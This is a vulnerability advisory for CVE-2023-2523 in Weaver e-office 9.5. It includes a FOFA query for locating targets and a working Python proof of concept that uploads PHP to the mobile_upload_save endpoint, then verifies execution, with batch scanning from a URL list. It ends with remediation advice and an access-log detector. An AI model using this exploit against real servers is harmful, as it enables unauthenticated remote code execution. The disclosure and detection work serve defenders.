Vulnerability details
In Weaver e-office 9.5, part of the functionality behind the source file App/Ajax/ajax.php?action=mobile_upload_save is affected. Manipulation of the parameter upload_quwan results in an unrestricted file upload: an unauthenticated remote attacker can upload a malicious file and thereby take control of the target server.
CVE-2023-2523
Affected versions
Weaver e-office 9.5
FOFA
FOFA: app="泛微-EOffice"
POC
import base64
import re
import sys

import requests


def POC(url):
    url1 = url + '/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save'
    # Request headers
    headers = {
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
    }
    # Form data: the multipart body, stored base64-encoded
    data = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZFJWQ0dXcTRDeDNTcTZ0dApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwbG9hZF9xdXdhbiI7IGZpbGVuYW1lPSJ0ZXN0LnBocC4iCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZwoKPD9waHAgcHJpbnQoMjU2KiAyNTYpOyB1bmxpbmsoX19GSUxFX18pOz8+Ci0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9IiIKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0KIAogCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWRSVkNHV3E0Q3gzU3E2dHQtLQ=='
    try:
        response = requests.post(url1, headers=headers, data=base64.b64decode(data), timeout=2)
        # The response contains the 10-digit attachment id under which the file was stored
        matches = re.findall(r"(\d{10})", response.text)
        url = url + "/attachment/" + matches[1] + "/test.php"
        resp = requests.get(url)
        if resp.status_code == 200 and "65536" in resp.text:
            print("vulning !!!!!!!!!!!!!")
        else:
            print("vuln not exists")
    except Exception as e:
        print(e)
        print("连接失败")


# Normalise the URL to the form http://xxx.xxx.xxx:xxx
def filter_url_path(url):
    # Split the URL at the double slash //
    parts1 = url.split("//")
    ip = parts1[1]
    parts2 = ip.split("/")
    if len(parts2) > 0:
        return parts1[0] + "//" + parts2[0]
    # Unreachable: str.split always returns at least one element
    return url


# Read URLs from a file, one per line
def process_file(file_path):
    with open(file_path, "r") as file:
        for line in file:
            url = line.strip()  # strip the trailing newline
            POC(url)


if __name__ == '__main__':
    args = sys.argv[1:]
    if not args:
        print("Please provide a URL or file path as an argument.")
    else:
        # Note: proxies is defined here but never passed to the requests calls above
        proxies = {
            "http": "http://127.0.0.1:8080",
            "https": "https://127.0.0.1:8080"
        }
        first_arg = args[0]
        if first_arg.startswith("http"):
            POC(first_arg)
        else:
            process_file(first_arg)
Remediation advice
At the time of writing the vendor has not released a fix for this issue. Users of this software are advised to monitor the vendor's homepage or the reference URL below for a solution: https://global.weaver.com.cn/website/en/eoffice.html
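While no vendor patch is available, the request sequence above can at least be detected in web-server access logs. The following detector is an added example, not code from the original post: it assumes a combined-format access log, uses constructed sample lines, and flags any source that POSTs to the mobile_upload_save action and later fetches a .php file from /attachment/<10-digit id>/.

```python
import re
from collections import defaultdict

# Combined access-log format (Apache/nginx style); the sample lines below are constructed
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
# Upload endpoint and action named in the advisory
UPLOAD_PATH = "/E-mobile/App/Ajax/ajax.php"
UPLOAD_ACTION = "action=mobile_upload_save"
# Uploaded files are served from /attachment/<10-digit id>/<filename>
ATTACH_PHP_RE = re.compile(r"^/attachment/\d{10}/[^/?]+\.php\.?(?:\?.*)?$", re.IGNORECASE)

def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Tag a parsed entry as 'upload', 'php_fetch' or None."""
    base, _, query = entry["path"].partition("?")
    if entry["method"] == "POST" and base == UPLOAD_PATH and UPLOAD_ACTION in query:
        return "upload"
    if entry["method"] == "GET" and ATTACH_PHP_RE.match(entry["path"]):
        return "php_fetch"
    return None

def find_suspects(lines):
    """Return {ip: events} for sources that POST to the upload action and later GET a .php file under /attachment/."""
    events = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        kind = classify(entry) if entry else None
        if kind:
            events[entry["ip"]].append((kind, entry["path"], entry["status"]))
    suspects = {}
    for ip, evs in events.items():
        kinds = [k for k, _, _ in evs]
        # The PHP fetch must come after the upload in log order
        if "upload" in kinds and "php_fetch" in kinds[kinds.index("upload"):]:
            suspects[ip] = evs
    return suspects

# Constructed sample lines (not real traffic); the first two mirror the POC's request sequence
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1" 200 214',
    '203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "GET /attachment/1710064801/test.php HTTP/1.1" 200 5',
    '198.51.100.4 - - [10/Mar/2025:10:01:00 +0000] "GET /attachment/1710064555/report.jpg HTTP/1.1" 200 9021',
    '198.51.100.9 - - [10/Mar/2025:10:02:00 +0000] "POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1" 200 214',
]
```

Because the follow-up GET is only the POC's verification step and need not appear in real traffic, a lone unauthenticated POST to the upload action (as from 198.51.100.9 above) deserves a lower-severity alert of its own, and serving PHP from the attachment directory should be disabled at the web-server level.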